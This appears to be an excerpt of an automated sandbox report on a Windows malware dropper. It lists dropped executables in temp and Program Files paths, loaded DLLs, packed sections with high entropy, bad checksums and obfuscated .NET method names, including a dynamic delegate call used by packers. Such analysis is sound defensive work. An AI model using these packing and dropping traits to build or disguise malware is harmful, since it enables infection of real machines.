Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: edputil.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: dwrite.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: audioses.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: powrprof.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: umpdc.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: msacm32.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: midimap.dll
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Section loaded: schannel.dll

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Common Files\Adobe\d1323f9dc58b56
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Windows Sidebar\b1f3a7b70830da

Source: download.php.exe.bin.exe

Static file information: File size 5648896 > 1048576

Source: download.php.exe.bin.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x55ac00

Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: download.php.exe.bin.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: download.php.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: download.php.exe.bin.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: download.php.exe.bin.exe, download.php.exe.bin.exe, 00000000.00000000.1258668306.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, G2C28.exe, G2C28.exe, 00000001.00000000.1262009453.0000000000E21000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: wextract.pdbGCTL source: download.php.exe.bin.exe, 00000000.00000000.1258668306.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, G2C28.exe, 00000001.00000000.1262009453.0000000000E21000.00000020.00000001.01000000.00000004.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Unpacked PE file: 3.2.1Z46i3.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 9.2.rapes.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 10.2.rapes.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Unpacked PE file: 11.2.2Q0510.exe.60000.0.unpack :EW;.rsrc:W;.idata :W;dpbgcdjd:EW;yzulbxlk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dpbgcdjd:EW;yzulbxlk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 15.2.rapes.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zozhizjy:EW;lfbuqywa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Unpacked PE file: 16.2.cuFIzyH.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwyzemoa:EW;uifxheza:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwyzemoa:EW;uifxheza:EW;.taggant:EW;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe

Unpacked PE file: 43.2.7T7bCyA.exe.3190000.1.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 6z1l5Yn[1].exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6z1l5Yn.exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: mAtJWNv[1].exe.15.dr, Ce716WgjPJi1to0DwO.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
Source: mAtJWNv.exe.15.dr, Ce716WgjPJi1to0DwO.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: mAtJWNv[1].exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: NA4BaGdVL2
Source: mAtJWNv[1].exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: D0mHsQPh9h
Source: mAtJWNv.exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: NA4BaGdVL2
Source: mAtJWNv.exe.15.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: D0mHsQPh9h

Source: random[2].exe.15.dr

Static PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E2202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

1_2_00E2202A

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: EJmAkGq.exe.15.dr	Static PE information: real checksum: 0x20b4e9 should be: 0x2078d7
Source: c353af48cf.exe.15.dr	Static PE information: real checksum: 0x2d25ad should be: 0x2cc5dd
Source: f3f3c71039.exe.15.dr	Static PE information: real checksum: 0x1da260 should be: 0x1d2e79
Source: random[1].exe0.15.dr	Static PE information: real checksum: 0x3cee73 should be: 0x3d0eb2
Source: 3B05c.exe.0.dr	Static PE information: real checksum: 0x1b9ca0 should be: 0x1c3e8f
Source: cuFIzyH[1].exe.15.dr	Static PE information: real checksum: 0x1c8266 should be: 0x1d34ba
Source: P2SXMuh[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x12e569
Source: 6z1l5Yn[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0xb5288
Source: cuFIzyH.exe.15.dr	Static PE information: real checksum: 0x1c8266 should be: 0x1d34ba
Source: random[1].exe1.15.dr	Static PE information: real checksum: 0x1da260 should be: 0x1d2e79
Source: P2SXMuh.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x12e569
Source: 477fbd5c21.exe.15.dr	Static PE information: real checksum: 0x471b86 should be: 0x472a31
Source: 0uzaP1a.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x7f88a
Source: 6z1l5Yn.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0xb5288
Source: random[2].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x6445a
Source: d151155bf3.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x6445a
Source: 2Q0510.exe.1.dr	Static PE information: real checksum: 0x31082f should be: 0x3169c6
Source: f86c60eea6.exe.15.dr	Static PE information: real checksum: 0x3cee73 should be: 0x3d0eb2
Source: 1Z46i3.exe.1.dr	Static PE information: real checksum: 0x1d0f5c should be: 0x1d707e
Source: random[1].exe.15.dr	Static PE information: real checksum: 0x2d25ad should be: 0x2cc5dd
Source: rapes.exe.3.dr	Static PE information: real checksum: 0x1d0f5c should be: 0x1d707e
Source: cuFIzyH.exe0.15.dr	Static PE information: real checksum: 0x1c8266 should be: 0x1d34ba
Source: 8p5Lrev[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x1638c7
Source: random[1].exe2.15.dr	Static PE information: real checksum: 0x471b86 should be: 0x472a31
Source: 0uzaP1a[1].exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x7f88a
Source: ClhN6R8.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0xfb864

Source: 3B05c.exe.0.dr	Static PE information: section name:
Source: 3B05c.exe.0.dr	Static PE information: section name: .idata
Source: 3B05c.exe.0.dr	Static PE information: section name:
Source: 3B05c.exe.0.dr	Static PE information: section name: yuojusbw
Source: 3B05c.exe.0.dr	Static PE information: section name: dpcyvtzx
Source: 3B05c.exe.0.dr	Static PE information: section name: .taggant
Source: 1Z46i3.exe.1.dr	Static PE information: section name:
Source: 1Z46i3.exe.1.dr	Static PE information: section name: .idata
Source: 1Z46i3.exe.1.dr	Static PE information: section name:
Source: 1Z46i3.exe.1.dr	Static PE information: section name: zozhizjy
Source: 1Z46i3.exe.1.dr	Static PE information: section name: lfbuqywa
Source: 1Z46i3.exe.1.dr	Static PE information: section name: .taggant
Source: 2Q0510.exe.1.dr	Static PE information: section name:
Source: 2Q0510.exe.1.dr	Static PE information: section name: .idata
Source: 2Q0510.exe.1.dr	Static PE information: section name: dpbgcdjd
Source: 2Q0510.exe.1.dr	Static PE information: section name: yzulbxlk
Source: 2Q0510.exe.1.dr	Static PE information: section name: .taggant
Source: rapes.exe.3.dr	Static PE information: section name:
Source: rapes.exe.3.dr	Static PE information: section name: .idata
Source: rapes.exe.3.dr	Static PE information: section name:
Source: rapes.exe.3.dr	Static PE information: section name: zozhizjy
Source: rapes.exe.3.dr	Static PE information: section name: lfbuqywa
Source: rapes.exe.3.dr	Static PE information: section name: .taggant
Source: EJmAkGq.exe.15.dr	Static PE information: section name:
Source: EJmAkGq.exe.15.dr	Static PE information: section name: .idata
Source: EJmAkGq.exe.15.dr	Static PE information: section name:
Source: EJmAkGq.exe.15.dr	Static PE information: section name: grpnkoxr
Source: EJmAkGq.exe.15.dr	Static PE information: section name: gkiotden
Source: EJmAkGq.exe.15.dr	Static PE information: section name: .taggant
Source: random[1].exe.15.dr	Static PE information: section name:
Source: random[1].exe.15.dr	Static PE information: section name: .idata
Source: random[1].exe.15.dr	Static PE information: section name: khhqdldm
Source: random[1].exe.15.dr	Static PE information: section name: vrvxjyww
Source: random[1].exe.15.dr	Static PE information: section name: .taggant
Source: c353af48cf.exe.15.dr	Static PE information: section name:
Source: c353af48cf.exe.15.dr	Static PE information: section name: .idata
Source: c353af48cf.exe.15.dr	Static PE information: section name: khhqdldm
Source: c353af48cf.exe.15.dr	Static PE information: section name: vrvxjyww
Source: c353af48cf.exe.15.dr	Static PE information: section name: .taggant
Source: random[1].exe0.15.dr	Static PE information: section name:
Source: random[1].exe0.15.dr	Static PE information: section name: .idata
Source: random[1].exe0.15.dr	Static PE information: section name:
Source: random[1].exe0.15.dr	Static PE information: section name: azeqhpsz
Source: random[1].exe0.15.dr	Static PE information: section name: rloejspv
Source: random[1].exe0.15.dr	Static PE information: section name: .taggant
Source: f86c60eea6.exe.15.dr	Static PE information: section name:
Source: f86c60eea6.exe.15.dr	Static PE information: section name: .idata
Source: f86c60eea6.exe.15.dr	Static PE information: section name:
Source: f86c60eea6.exe.15.dr	Static PE information: section name: azeqhpsz
Source: f86c60eea6.exe.15.dr	Static PE information: section name: rloejspv
Source: f86c60eea6.exe.15.dr	Static PE information: section name: .taggant
Source: random[1].exe1.15.dr	Static PE information: section name:
Source: random[1].exe1.15.dr	Static PE information: section name: .idata
Source: random[1].exe1.15.dr	Static PE information: section name:
Source: random[1].exe1.15.dr	Static PE information: section name: bwotgmgc
Source: random[1].exe1.15.dr	Static PE information: section name: zauvkhtg
Source: random[1].exe1.15.dr	Static PE information: section name: .taggant
Source: f3f3c71039.exe.15.dr	Static PE information: section name:
Source: f3f3c71039.exe.15.dr	Static PE information: section name: .idata
Source: f3f3c71039.exe.15.dr	Static PE information: section name:
Source: f3f3c71039.exe.15.dr	Static PE information: section name: bwotgmgc
Source: f3f3c71039.exe.15.dr	Static PE information: section name: zauvkhtg
Source: f3f3c71039.exe.15.dr	Static PE information: section name: .taggant
Source: random[1].exe2.15.dr	Static PE information: section name:
Source: random[1].exe2.15.dr	Static PE information: section name: .idata
Source: random[1].exe2.15.dr	Static PE information: section name:
Source: random[1].exe2.15.dr	Static PE information: section name: dlsxswkk
Source: random[1].exe2.15.dr	Static PE information: section name: vtltmzea
Source: random[1].exe2.15.dr	Static PE information: section name: .taggant
Source: 477fbd5c21.exe.15.dr	Static PE information: section name:
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: .idata
Source: 477fbd5c21.exe.15.dr	Static PE information: section name:
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: dlsxswkk
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: vtltmzea
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: .taggant
Source: random[2].exe.15.dr	Static PE information: section name: .CSS
Source: d151155bf3.exe.15.dr	Static PE information: section name: .CSS
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name:
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: .idata
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name:
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: cwyzemoa
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: uifxheza
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: .taggant
Source: cuFIzyH.exe.15.dr	Static PE information: section name:
Source: cuFIzyH.exe.15.dr	Static PE information: section name: .idata
Source: cuFIzyH.exe.15.dr	Static PE information: section name:
Source: cuFIzyH.exe.15.dr	Static PE information: section name: cwyzemoa
Source: cuFIzyH.exe.15.dr	Static PE information: section name: uifxheza
Source: cuFIzyH.exe.15.dr	Static PE information: section name: .taggant
Source: cuFIzyH.exe0.15.dr	Static PE information: section name:
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: .idata
Source: cuFIzyH.exe0.15.dr	Static PE information: section name:
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: cwyzemoa
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: uifxheza
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: .taggant
Source: mAtJWNv[1].exe.15.dr	Static PE information: section name: .css
Source: mAtJWNv.exe.15.dr	Static PE information: section name: .css

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E2724D push ecx; ret	1_2_00E27260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00077BAE push edi; ret	11_2_00077BB0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D79FC1 push ecx; ret	15_2_00D79FD4
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7CA05 pushfd ; ret	17_2_00A7CA09
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7CC5D push 89D0F735h; ret	17_2_00A7CC65
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A88D7A push ecx; ret	17_2_00A88D8D

Source: 3B05c.exe.0.dr	Static PE information: section name: yuojusbw entropy: 7.953625478218773
Source: 1Z46i3.exe.1.dr	Static PE information: section name: entropy: 7.9769710302059655
Source: 1Z46i3.exe.1.dr	Static PE information: section name: zozhizjy entropy: 7.954710330870106
Source: 2Q0510.exe.1.dr	Static PE information: section name: entropy: 7.071224525437036
Source: rapes.exe.3.dr	Static PE information: section name: entropy: 7.9769710302059655
Source: rapes.exe.3.dr	Static PE information: section name: zozhizjy entropy: 7.954710330870106
Source: EJmAkGq.exe.15.dr	Static PE information: section name: entropy: 7.147151884597137
Source: EJmAkGq.exe.15.dr	Static PE information: section name: grpnkoxr entropy: 7.954246998260437
Source: random[1].exe.15.dr	Static PE information: section name: entropy: 7.985955127476928
Source: c353af48cf.exe.15.dr	Static PE information: section name: entropy: 7.985955127476928
Source: random[1].exe0.15.dr	Static PE information: section name: azeqhpsz entropy: 7.9549978727956905
Source: f86c60eea6.exe.15.dr	Static PE information: section name: azeqhpsz entropy: 7.9549978727956905
Source: random[1].exe1.15.dr	Static PE information: section name: entropy: 7.974433700409485
Source: random[1].exe1.15.dr	Static PE information: section name: bwotgmgc entropy: 7.952333287675745
Source: f3f3c71039.exe.15.dr	Static PE information: section name: entropy: 7.974433700409485
Source: f3f3c71039.exe.15.dr	Static PE information: section name: bwotgmgc entropy: 7.952333287675745
Source: random[1].exe2.15.dr	Static PE information: section name: dlsxswkk entropy: 7.954836278148466
Source: 477fbd5c21.exe.15.dr	Static PE information: section name: dlsxswkk entropy: 7.954836278148466
Source: ClhN6R8.exe.15.dr	Static PE information: section name: .text entropy: 7.102077354688428
Source: 6z1l5Yn[1].exe.15.dr	Static PE information: section name: .text entropy: 6.997670674019712
Source: 6z1l5Yn.exe.15.dr	Static PE information: section name: .text entropy: 6.997670674019712
Source: 8p5Lrev[1].exe.15.dr	Static PE information: section name: .text entropy: 7.102077354688428
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: entropy: 7.984370394339952
Source: cuFIzyH[1].exe.15.dr	Static PE information: section name: cwyzemoa entropy: 7.953347662470753
Source: cuFIzyH.exe.15.dr	Static PE information: section name: entropy: 7.984370394339952
Source: cuFIzyH.exe.15.dr	Static PE information: section name: cwyzemoa entropy: 7.953347662470753
Source: P2SXMuh[1].exe.15.dr	Static PE information: section name: .text entropy: 7.087634248192435
Source: P2SXMuh.exe.15.dr	Static PE information: section name: .text entropy: 7.087634248192435
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: entropy: 7.984370394339952
Source: cuFIzyH.exe0.15.dr	Static PE information: section name: cwyzemoa entropy: 7.953347662470753

Source: 6z1l5Yn[1].exe.15.dr, f2FLp.cs	High entropy of concatenated method names: 'obANCaAnNx4KZoKT1o', 'f7Sa8wTGIEs7kjnHPV', 'ghc7KqLXrCY49gucEK', 'l1MSjrX3ZtGHrMNl7c', 'gmPbA5aM0f8ZXFdlwl', 'siJ4m6b5OBhpJ7PgDM', 'vxBSgn0lZRgDbASTbx', 'l3pAYqBKNsbIAwsE63'
Source: 6z1l5Yn[1].exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	High entropy of concatenated method names: 'TM7Hxf2LdhRo1KhW05o', 'XIJ18v2XBv7FGXQoiNP', 'TL5SdT2aPKUrkFNNad5', 'qGSQHm2bpGI0Mtwpw9h', 'ce4DmfsmSrOT856tDgfrkMb', 'e1jbuHb7Bs', 'DUlSM82o5dk1Ercvdrk', 'dJjIQr2dC5i1EDTSF9K', 'zJFs5y2PPNK5fqeNKwB', 'jbcTcm2Gd5jTIEso1r7'
Source: 6z1l5Yn[1].exe.15.dr, w4XEo2p.cs	High entropy of concatenated method names: 'r4X1Bkx', 'MoveNext', 'k5B8Hzo', 'SetStateMachine', 'ks2s06VSVoqRaEF7Obm', 'TMQCfMV6W0QyrUpGTgb', 'U1pmY7VkY3AgGeCDt4T', 'lib5yQVI1Ddm1KXgjgo', 'UadANxVORh2PV8ahXg7', 's2poJrVfujd50MrLTgw'
Source: 6z1l5Yn[1].exe.15.dr, Wy6b3.cs	High entropy of concatenated method names: 's1RGr', 'MoveNext', 'Cq79K', 'SetStateMachine', 'VkwDG9nQnRohnNoghCT', 'igP30xnkJlkvVTTNqH9', 'N1Zi0ancmWXyn8WdKiK', 'L31I0mnnS73DqVR899m', 'Vp2mLhnIF2l3X8pO6c5', 'CeU5runSs5P93p1w5wZ'
Source: 6z1l5Yn[1].exe.15.dr, Zy32P.cs	High entropy of concatenated method names: 's4SHg', 'MoveNext', 'Pj76R', 'SetStateMachine', 'Sa6UdNIfq2Zk31IxqZe', 'Bg6mcIIV0OjYLuKCZJw', 'veIOi7I6EcgaIekXGMY', 'FxscGYIOoc2G1GbyqVr', 'Dpli5JI2eZ6AndltT0i', 'flawvnIttWl4YtLfoae'
Source: 6z1l5Yn[1].exe.15.dr, Jw1z3XS.cs	High entropy of concatenated method names: 'Pr65Sic', 'Gt85ZsK', 'Tz54Qry', 'DG175AOCyVArrXryc1M', 'frF8RjO8g9GAKgxqSLB', 'e0W2YtONay1YW7r320A', 'dtr7GDODyJMKJwh0GTD', 'GlQPpfOUrIJVAXQMoY6', 'RU2vvIO0UUhFnbQ6VO5', 'aksoVqOBGDGv7596UAB'
Source: 6z1l5Yn[1].exe.15.dr, g4E6Q.cs	High entropy of concatenated method names: 'Ez9j1', 'z0QNw', 'tSge1CSYfRT5Kck3JTR', 'hR0NgbSeAsZ4M48l4C2', 'iFGulfSmhILImZpKLRr', 'P51VMQSpFJPe8M5riIW', 'zc5BVXSgfaJC3avjHOU', 'Mq64P', 'cf9PZ4Sik4GWPsx7jOs', 'FrTusMSresPKMuWkR2D'
Source: 6z1l5Yn[1].exe.15.dr, Ny4p1S8.cs	High entropy of concatenated method names: 'xQXrO5ffUqHeWSk1bJE', 'M2IvPTfVLYC42spjo1s', 'v0tnRhf65T98p3ROlNF', 'g8QyjZfOG1fICoEVPsJ', 'Zy4f1X8', 'q0J7Gde', 'Pr19EiC', 'r9TQj38', 'Ko9r7QA', 'Px8y1G5'
Source: 6z1l5Yn[1].exe.15.dr, o5CGf.cs	High entropy of concatenated method names: 'a3PDz02', 'QexoqZ6Radvmn1VKnUd', 'atR49B6MStJT1rBZpai', 'qNtW826eG2fSWPuEqT1', 'QesKfG6g71xfgGvuW8B', 'Zx7n3', 'Ny1p0', 'Wr9q5', 'c4GSk', 'Sd56P'
Source: 6z1l5Yn[1].exe.15.dr, x4QWw.cs	High entropy of concatenated method names: 'b2G3Q', 'q1MYs', 'An45W', 'w4DAt', 'Sq60Z', 'q1CJa', 'llGb2KQoGsfyF2cacjQ', 'JrFUsPQdZaVl1BOObYg', 'VZmjp8QAnI2dCfZJOdw', 'aEEBDJQTQr8XjGoRSL4'
Source: 6z1l5Yn[1].exe.15.dr, b8NKa72.cs	High entropy of concatenated method names: 'Kd0r2AF', 'MoveNext', 'q7T2Zgn', 'SetStateMachine', 'HVxlVrOkPRPfwie07Bl', 'Fh1t9pOIU2ohV6qmcv4', 'auxoSFOneI3RtPVZG9L', 'CCeED8OQO5DvDlfp2AN', 'aPBnHTOSX4GrioRtM04', 'kLf2tNO6FXAvc9VM07A'
Source: 6z1l5Yn[1].exe.15.dr, eyvhA9ywBJ81AtfmER.cs	High entropy of concatenated method names: 'CpOeQcVVkPvcG', 'iUAmXk2qJwSaQ9NWoWF', 'ikVRtj29jevm3eSB5AU', 'CRRISj2vZGtDYFJ0lYt', 'V93q0Q275EI6qGexGJT', 'OarONf2NHQCp4SLBakn', 'cpXTtb2wJkH7dJLteH2', 'dQAofN2sW7n7y2iMiXJ', 'JJKxr72DAM6316Pmp34', 'ugWW5U2CVZr92XsqROK'
Source: 6z1l5Yn[1].exe.15.dr, x7DHw6g4.cs	High entropy of concatenated method names: 'c6BYw', 'c9F1A', 'Qd20K', 'p8XZx', 'd7BXi', 's1K7X', 'GRGl4uY08vmViMoVUe', 'omYMLOeh2w0arrui0E', 'dXaTCUmEKfyMlXRN4m', 'SPMBEMpAKE2vtmXuri'
Source: 6z1l5Yn.exe.15.dr, f2FLp.cs	High entropy of concatenated method names: 'obANCaAnNx4KZoKT1o', 'f7Sa8wTGIEs7kjnHPV', 'ghc7KqLXrCY49gucEK', 'l1MSjrX3ZtGHrMNl7c', 'gmPbA5aM0f8ZXFdlwl', 'siJ4m6b5OBhpJ7PgDM', 'vxBSgn0lZRgDbASTbx', 'l3pAYqBKNsbIAwsE63'
Source: 6z1l5Yn.exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	High entropy of concatenated method names: 'TM7Hxf2LdhRo1KhW05o', 'XIJ18v2XBv7FGXQoiNP', 'TL5SdT2aPKUrkFNNad5', 'qGSQHm2bpGI0Mtwpw9h', 'ce4DmfsmSrOT856tDgfrkMb', 'e1jbuHb7Bs', 'DUlSM82o5dk1Ercvdrk', 'dJjIQr2dC5i1EDTSF9K', 'zJFs5y2PPNK5fqeNKwB', 'jbcTcm2Gd5jTIEso1r7'
Source: 6z1l5Yn.exe.15.dr, w4XEo2p.cs	High entropy of concatenated method names: 'r4X1Bkx', 'MoveNext', 'k5B8Hzo', 'SetStateMachine', 'ks2s06VSVoqRaEF7Obm', 'TMQCfMV6W0QyrUpGTgb', 'U1pmY7VkY3AgGeCDt4T', 'lib5yQVI1Ddm1KXgjgo', 'UadANxVORh2PV8ahXg7', 's2poJrVfujd50MrLTgw'
Source: 6z1l5Yn.exe.15.dr, Wy6b3.cs	High entropy of concatenated method names: 's1RGr', 'MoveNext', 'Cq79K', 'SetStateMachine', 'VkwDG9nQnRohnNoghCT', 'igP30xnkJlkvVTTNqH9', 'N1Zi0ancmWXyn8WdKiK', 'L31I0mnnS73DqVR899m', 'Vp2mLhnIF2l3X8pO6c5', 'CeU5runSs5P93p1w5wZ'
Source: 6z1l5Yn.exe.15.dr, Zy32P.cs	High entropy of concatenated method names: 's4SHg', 'MoveNext', 'Pj76R', 'SetStateMachine', 'Sa6UdNIfq2Zk31IxqZe', 'Bg6mcIIV0OjYLuKCZJw', 'veIOi7I6EcgaIekXGMY', 'FxscGYIOoc2G1GbyqVr', 'Dpli5JI2eZ6AndltT0i', 'flawvnIttWl4YtLfoae'
Source: 6z1l5Yn.exe.15.dr, Jw1z3XS.cs	High entropy of concatenated method names: 'Pr65Sic', 'Gt85ZsK', 'Tz54Qry', 'DG175AOCyVArrXryc1M', 'frF8RjO8g9GAKgxqSLB', 'e0W2YtONay1YW7r320A', 'dtr7GDODyJMKJwh0GTD', 'GlQPpfOUrIJVAXQMoY6', 'RU2vvIO0UUhFnbQ6VO5', 'aksoVqOBGDGv7596UAB'
